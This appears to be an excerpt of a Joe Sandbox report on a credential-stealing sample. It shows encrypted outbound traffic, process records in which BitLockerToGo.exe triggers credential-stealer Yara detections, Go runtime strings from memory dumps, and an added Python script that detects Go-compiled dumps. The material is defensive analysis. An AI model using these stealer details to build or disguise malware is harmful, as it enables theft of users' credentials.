2024-12-26 11:01:40 UTC | 15331 | OUT | Data Raw: c1 ce dc 37 6b 7c 71 06 a3 94 2d e8 08 28 f2 af 4e 1a d3 f2 5e dc 72 8d 0f 47 c4 f0 01 65 b3 a6 7b 3b f2 07 9a c3 17 8d 08 25 bb b6 85 05 5a 74 38 c6 8e eb 6e ee 75 37 5f 2f d6 63 4b 4e 73 77 7c 07 1e c0 bb 73 c0 65 22 31 f2 87 4e 61 39 3b d4 be 55 e1 ae 79 15 4f 5b 6b 9b 06 84 1b a6 a8 a2 21 81 a3 7b d2 81 ad a2 8b ca e3 a2 14 63 2e 1c 59 bd ae 9a b1 fc 7c 22 35 37 6d 59 03 9e 98 1f 02 2a ee 22 43 aa c9 6f 3b 27 07 7f 02 5a 28 bc f9 bf cd 72 b1 16 71 d9 92 87 f2 fe d8 b5 b3 a5 e7 47 f3 b6 41 99 04 d0 bb ba 48 cd b7 4d 82 f6 bf 7f 93 3b e7 d4 21 30 64 6f 0b 62 f9 77 38 2d ae e5 fa 1d 18 59 47 56 9d 8c d3 ef e8 cc 1b 8b 09 be b3 35 c5 ce 92 ea a6 47 13 b5 0c 35 3b 64 e3 d6 34 3b 30 4e 39 bf 3e 07 3d ba 4a 55 ab 3a 62 f8 aa c4 f1 9f 1f 53 45 b1 2d 32 e0 c7
Data Ascii: 7k|q-(N^rGe{;%Zt8nu7_/cKNsw|se"1Na9;UyO[k!{c.Y|"57mY*"Co;'Z(rqGAHM;!0dobw8-YGV5G5;d4;0N9>=JU:bSE-2
2024-12-26 11:01:40 UTC | 15331 | OUT | Data Raw: 46 10 7a 9e 1b fc 9e c8 a6 58 3a 67 34 dc 69 62 38 05 24 d0 c9 77 b1 9c 8f 5d 49 da 87 13 b7 02 01 9f 4f ba 69 fa 2f 6d 0f b5 b0 26 76 7e dd 4a 67 3e 33 36 4d 67 45 a4 57 cf f4 3e d8 fe 5d f6 28 fd fa 6c 77 ab e6 1a 93 86 4f e4 f7 ac 01 ac 3d f6 f5 d2 b1 41 6f d9 75 d2 b7 1a 07 12 66 b7 3c 7d 41 c0 9d ed 5b a1 52 29 f0 2c 27 c3 b1 73 b4 65 74 fc 44 97 32 2f 96 b0 07 f3 83 40 c0 09 3e 50 33 71 08 81 d0 63 ab 94 68 95 82 ed 6f d7 78 f7 33 d4 fb b6 bc 21 3d ff f8 2d b0 9f 21 0a 20 08 d0 34 f7 01 4d 1b 39 e2 09 e5 06 f5 0e ee 8c a2 c0 95 ab 6b ab 7f bc 2a 0e f7 07 d4 eb 2e 7c 7a 30 bb 78 ab b3 74 bb 08 fd ef 70 b7 78 8b 67 3e 5c a0 f7 58 cd 5b 9a 4e 03 c1 fb 03 44 7f 1f fd ef ac b9 6a 50 f0 ee e6 75 d0 75 3b 10 82 5f 44 f9 be 66 0d 43 c0 45 b2 e0 9c dd 7c a7
Data Ascii: FzX:g4ib8$w]IOi/m&v~Jg>36MgEW>](lwO=Aouf<}A[R),'setD2/@>P3qchox3!=-! 4M9k*.|z0xtpxg>\X[NDjPuu;_DfCE|
2024-12-26 11:01:43 UTC | 1135 | IN | HTTP/1.1 200 OK
Date: Thu, 26 Dec 2024 11:01:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=j96uap2odtftees1qk699a72bg; expires=Mon, 21 Apr 2025 04:48:21 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t9IMXls0vZgC%2FbqnaQUodRP7uG471CpGvzZR5jwDtRc%2Fo9B37qyi4A5YLxF1LJmdko%2FyPhaRkx8R7l%2FO%2BkuqNIEOYB82XWopTDip0KtLJSlbtfk4aJzW2NJ8XoD92ez7uGn%2B"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f80930249b041bd-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1668&min_rtt=1640&rtt_var=635&sent=383&recv=602&lost=0&retrans=0&sent_bytes=2840&recv_bytes=575963&delivery_rate=1780487&cwnd=249&unsent_bytes=0&cid=ecb5c75c40aa186f&ts=2659&x=0"


Target ID: 0
Start time: 06:01:00
Start date: 26/12/2024
Path: C:\Users\user\Desktop\MPySEh8HaF.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\MPySEh8HaF.exe"
Imagebase: 0xff0000
File size: 7'409'664 bytes
MD5 hash: 58CFFD92455EEC9CD613EDE591ED6C2C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 06:01:20
Start date: 26/12/2024
Path: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Imagebase: 0x970000
File size: 231'736 bytes
MD5 hash: A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2029632902.0000000002AF2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2029943183.0000000002AF5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1976536875.0000000002AD4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2029593311.0000000002AEA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2028308961.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: moderate
Has exited: true

                                                                                                                      Strings
                                                                                                                      • %, xrefs: 01023854
                                                                                                                      • : duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=transform: input and output are not identicaltransitioning GC to the same state as before?tried to run scavenger from another, xrefs: 01023817
                                                                                                                      • bad g0 stackbad recoveryca-central-1caller errorcan't happencas64 failedchan receiveclose notifycontent-typecontext.TODOdumping heapend tracegcentersyscallescaped chareu-central-1exit status freeaddrinfogcBitsArenasgcpacertracegetaddrinfowharddecommithost is , xrefs: 0102373A
                                                                                                                      • : duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function s3.dualstack.ap-south-1.amazonaws.coms3.dualstack.eu-north-1.amazonaws.comsetprofilebucket: profile already setstartTheWorld: inconsistent mp->nextps, xrefs: 0102384B
                                                                                                                      • VirtualQuery for stack base failedadding nil Certificate to CertPool : invalid buffer overlapcrypto/rsa: missing public modulusdoaddtimer: P already set in timerdriver: remove argument from queryforEachP: sched.safePointWait != 0frame_settings_window_, xrefs: 01023795
                                                                                                                      • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:, xrefs: 01023761
                                                                                                                      • runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftservice unavailableskip this directorystopm holding lockssysMemStat overflowtoo many open filesunexpected g statusunknown Go type: %vunknown certificateunknown hash value unknown wait , xrefs: 010236CB
                                                                                                                      • runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=transform: input and output are not identicaltransitioning GC to the same state as before?tried to run scavenger from another goroutineunexpected trailing char found. Exp, xrefs: 010237BC
                                                                                                                      • CreateWaitableTimerEx when creating timer failedYou must provide the Content-Length HTTP header.bufio: writer returned negative count from Writecould not find GetSystemTimeAsFileTime() syscallfail to read symbol table: %d aux symbols unreadinvalid certificate , xrefs: 010237F0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1898991738.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1898974889.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1899306886.000000000131A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1899306886.0000000001419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1899541418.000000000161C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1899560216.0000000001625000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1899578012.0000000001626000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1899594168.0000000001627000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1899650420.00000000016BB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1899668510.00000000016BF000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1899685753.00000000016C0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1899685753.00000000016C9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1899685753.00000000016CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1899685753.00000000016E9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1899685753.00000000016ED000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1899776570.00000000016F0000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1899793279.00000000016F1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1899793279.0000000001715000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_ff0000_MPySEh8HaF.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: : duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=transform: input and output are not identicaltransitioning GC to the same state as before?tried to run scavenger from another$ : duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function s3.dualstack.ap-south-1.amazonaws.coms3.dualstack.eu-north-1.amazonaws.comsetprofilebucket: profile already setstartTheWorld: inconsistent mp->nextps$%$CreateWaitableTimerEx when creating timer failedYou must provide the Content-Length HTTP header.bufio: writer returned negative count from Writecould not find GetSystemTimeAsFileTime() syscallfail to read symbol table: %d aux symbols unreadinvalid certificate $VirtualQuery for stack base failedadding nil Certificate to CertPool : invalid buffer overlapcrypto/rsa: missing public modulusdoaddtimer: P already set in timerdriver: remove argument from queryforEachP: sched.safePointWait != 0frame_settings_window_$bad g0 stackbad recoveryca-central-1caller errorcan't happencas64 failedchan receiveclose notifycontent-typecontext.TODOdumping heapend tracegcentersyscallescaped chareu-central-1exit status freeaddrinfogcBitsArenasgcpacertracegetaddrinfowharddecommithost is $runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=transform: input and output are not identicaltransitioning GC to the same state as before?tried to run scavenger from another goroutineunexpected trailing char found. Exp$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:$runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftservice unavailableskip this directorystopm holding lockssysMemStat overflowtoo many open filesunexpected g statusunknown Go type: %vunknown certificateunknown hash value unknown wait
                                                                                                                      • API String ID: 0-2060340962
                                                                                                                      • Opcode ID: 3562154d446e92735e14f48931790a625ae4fc1fdd28136b74e0c199e1b45b10
                                                                                                                      • Instruction ID: 3da853e3e6b74ce1329fb3f0f614ddbdec93df023baa6fcc11d887dbb95fbed6
                                                                                                                      • Opcode Fuzzy Hash: 3562154d446e92735e14f48931790a625ae4fc1fdd28136b74e0c199e1b45b10
                                                                                                                      • Instruction Fuzzy Hash: 2381D2B45093128FD350EF68C19879ABBE4BF98704F05892EE8C88B350EB79D945CF52
                                                                                                                      Strings
                                                                                                                      • p->status= s.nelems= schedtick= span.list= timerslen=!!timestamp%!(BADPREC)) at entry+* [CONTEXT], elemsize=, npages = -syncWithWU.WithCancel/dev/stderr/dev/stdout/index.html0123456789_30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s, xrefs: 010336C7
                                                                                                                      • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/br, xrefs: 01033711
                                                                                                                      • releasep: m=runtime: gp=runtime: sp=self-preemptsetupapi.dllshort bufferspanSetSpinestruct fieldsweepWaiterstoo long inttraceStringstransmitfileunexpected )unknown portunknown typewintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen (default %q) (defa, xrefs: 01033659
                                                                                                                      • m->p= max= min= next= p->m= prev= span=!!bool!!null% util%s[%dm' for (...), i = , not , val .local.onion.reloc390625<-chanAacuteAgraveAnswerArabicAtildeAugustBrahmiCANCELCarianCcedilChakmaCommonCopticDaggerENCLogENCMapEacuteEgraveExpectExportFlags=FormatFr, xrefs: 0103367B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1898991738.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1898974889.0000000000FF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1899306886.000000000131A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1899306886.0000000001419000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1899541418.000000000161C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1899560216.0000000001625000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1899578012.0000000001626000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1899594168.0000000001627000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1899650420.00000000016BB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1899668510.00000000016BF000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1899685753.00000000016C0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1899685753.00000000016C9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1899685753.00000000016CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1899685753.00000000016E9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1899685753.00000000016ED000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1899776570.00000000016F0000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1899793279.00000000016F1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1899793279.0000000001715000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_ff0000_MPySEh8HaF.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: m->p= max= min= next= p->m= prev= span=!!bool!!null% util%s[%dm' for (...), i = , not , val .local.onion.reloc390625<-chanAacuteAgraveAnswerArabicAtildeAugustBrahmiCANCELCarianCcedilChakmaCommonCopticDaggerENCLogENCMapEacuteEgraveExpectExportFlags=FormatFr$ p->status= s.nelems= schedtick= span.list= timerslen=!!timestamp%!(BADPREC)) at entry+* [CONTEXT], elemsize=, npages = -syncWithWU.WithCancel/dev/stderr/dev/stdout/index.html0123456789_30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/br$releasep: m=runtime: gp=runtime: sp=self-preemptsetupapi.dllshort bufferspanSetSpinestruct fieldsweepWaiterstoo long inttraceStringstransmitfileunexpected )unknown portunknown typewintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen (default %q) (defa
                                                                                                                      • API String ID: 0-2036700675
                                                                                                                      • Opcode ID: c6e0ae2aff1a2fa4c7c579b3995fb687ae5e7e0b23d7d3bbda8b557ad49943da
                                                                                                                      • Instruction ID: 1dd7287b172005035c407196aa08876714e33046abf910d0ff3a2285ad36baa5
                                                                                                                      • Opcode Fuzzy Hash: c6e0ae2aff1a2fa4c7c579b3995fb687ae5e7e0b23d7d3bbda8b557ad49943da
                                                                                                                      • Instruction Fuzzy Hash: 2031D2B8509316CFD310EF24C19479ABBE4BF98754F05896EE8C88B341D735D884DBA2
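The string tables of the two functions above (String ID and Strings entries) are dominated by Go runtime and standard-library messages: `runtime: mcall called on m->g0 stack`, `startTheWorld: inconsistent mp->nextp`, `semaRoot rotateLeft`, `gcBitsArenas`, `sysMemStat overflow`, `crypto/rsa: missing public modulus`. Those strings are emitted by the Go toolchain, not by hand-written code, so the memory region they sit in was compiled from Go. The Python below is an added triage example, not part of the Joe Sandbox report or of its analysis pipeline: it scans a raw dump (such as one of the `.sdmp` files listed above) for the runtime strings seen here and, where the Go 1.18+ build-info header (`\xff Go buildinf:` followed by an inline version string) is present, extracts the toolchain version. The input `SAMPLE_DUMP` is a constructed blob, not data from this analysis; the marker threshold of two strings is an assumption chosen for illustration.

```python
"""Triage check for memory dumps: is this region Go-compiled, and by which toolchain?

Added example, not Joe Sandbox code. Marker strings are taken from the Go runtime
strings listed in this report; SAMPLE_DUMP is constructed for the demonstration.
"""

# Distinctive Go runtime/stdlib strings that appear in this report's string tables.
GO_RUNTIME_MARKERS = [
    b"runtime: CreateWaitableTimerEx failed",
    b"runtime: VirtualQuery failed",
    b"runtime: mcall called on m->g0 stack",
    b"runtime: newstack sp=",
    b"startTheWorld: inconsistent mp->nextp",
    b"semaRoot rotateLeft",
    b"gcBitsArenas",
    b"gcpacertrace",
    b"sysMemStat overflow",
    b"crypto/rsa: missing public modulus",
    b"bufio: writer returned negative count from Write",
]

# Layout of the Go build-info block (debug/buildinfo): 14-byte magic, 1 byte
# pointer size, 1 byte flags, then two pointer slots (unused when flags say inline).
BUILDINFO_MAGIC = b"\xff Go buildinf:"
BUILDINFO_HEADER = 32
FLAGS_VERSION_INLINE = 0x02   # Go >= 1.18: version and modinfo follow as uvarint-length strings


def find_go_runtime_markers(data: bytes) -> list:
    """Return the known Go runtime strings that occur in the blob."""
    return [m.decode() for m in GO_RUNTIME_MARKERS if m in data]


def _read_uvarint(data: bytes, off: int):
    """Decode a Go encoding/binary uvarint at off; returns (value, offset after it)."""
    result, shift = 0, 0
    while True:
        b = data[off]                    # IndexError on a truncated blob is handled by the caller
        off += 1
        result |= (b & 0x7F) << shift
        if b < 0x80:
            return result, off
        shift += 7
        if shift > 63:
            raise ValueError("uvarint too long")


def go_buildinfo_version(data: bytes):
    """Extract the toolchain version from a Go 1.18+ inline build-info header.

    Pre-1.18 headers store pointers to the strings instead; resolving them needs the
    loaded image layout, so a raw scan reports None for those.
    """
    off = data.find(BUILDINFO_MAGIC)
    while off != -1 and off + BUILDINFO_HEADER <= len(data):
        ptr_size = data[off + 14]
        flags = data[off + 15]
        if ptr_size in (4, 8):           # sanity check against a chance magic hit
            if flags & FLAGS_VERSION_INLINE:
                try:
                    n, p = _read_uvarint(data, off + BUILDINFO_HEADER)
                    return data[p:p + n].decode("ascii")
                except (IndexError, ValueError, UnicodeDecodeError):
                    return None
            return None
        off = data.find(BUILDINFO_MAGIC, off + 1)
    return None


def classify_dump(data: bytes) -> dict:
    """Combine both signals; the two-marker threshold is an illustrative assumption."""
    markers = find_go_runtime_markers(data)
    version = go_buildinfo_version(data)
    return {
        "go_markers": markers,
        "go_version": version,
        "likely_go": len(markers) >= 2 or version is not None,
    }


def _constructed_dump() -> bytes:
    """Constructed test blob: padding, a Go 1.18+ header with an inline version
    string and empty module info, then two runtime strings. Not data from this analysis."""
    version = b"go1.21.5"
    header = BUILDINFO_MAGIC + bytes([8, FLAGS_VERSION_INLINE]) + b"\x00" * 16
    assert len(header) == BUILDINFO_HEADER
    blob = b"\x00" * 48 + header + bytes([len(version)]) + version + b"\x00"
    blob += b"\x00" * 8 + b"runtime: mcall called on m->g0 stack\x00semaRoot rotateLeft\x00"
    return blob


SAMPLE_DUMP = _constructed_dump()
# A constructed non-Go blob: PE stub text with none of the runtime markers.
NOT_GO = b"MZ\x90\x00" + b"\x00" * 60 + b"This program cannot be run in DOS mode\x00"

if __name__ == "__main__":
    print(classify_dump(SAMPLE_DUMP))
    print(classify_dump(NOT_GO))
```

Run it against a real `.sdmp` by reading the file as bytes and passing it to `classify_dump`. A positive result tells you to reach for Go-aware tooling (function-name recovery from the pclntab, module path from the build info) before spending time on the disassembly of individual functions like the two above, whose instruction hashes describe compiler-generated runtime code rather than the stealer's own logic.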